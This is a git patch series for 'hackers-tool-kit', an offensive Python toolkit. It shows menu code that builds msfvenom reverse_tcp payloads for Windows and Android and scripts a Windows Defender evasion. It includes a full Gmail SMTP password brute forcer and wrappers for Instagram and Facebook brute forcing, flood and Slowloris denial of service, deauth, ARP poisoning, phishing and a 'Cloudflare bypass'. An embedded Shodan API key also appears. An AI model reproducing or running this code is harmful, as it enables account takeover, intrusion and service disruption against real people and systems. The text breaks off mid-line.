jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +def upgrade(): + os.system("apt update && apt upgrade") +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arppois": + appois() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + found = True +mainbanner() +main() From fb3ca5324394b807b736bbcd7463c83a540c84ae Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 24 Mar 2019 19:49:03 +0100 Subject: [PATCH 055/214] Update README.md --- README.md | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/README.md b/README.md index e0fd5c3..221fff8 100644 --- a/README.md +++ b/README.md @@ -31,3 +31,10 @@ the htksecure.py file will run the hackers-tool-kit with proxychains and other t * `cd hackers-tool-kit` * `python htksecure.py` + +# UPDATES +this is where i will try to put the most recent updates + +* help banner update + +* added a connect option From c0b6459dec9f0b0fdc844c018eded6db1e0b3b6a Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 24 Mar 2019 19:56:58 +0100 Subject: [PATCH 056/214] Delete htk.py --- htk.py | 2054 -------------------------------------------------------- 1 file changed, 2054 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 4975b93..0000000 --- a/htk.py +++ /dev/null @@ -1,2054 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to show / edit this script without my credit -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -def mainbanner(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -clear : clears screen except for banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arppois : ARP poisoning | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║█████╗██║█████╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -\033[91m---------------------------------------------------------------------------------\033[0m - """ -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) -def wifite(): - os.system("wifite") -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -def netdev(): - os.system("netdiscover") -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 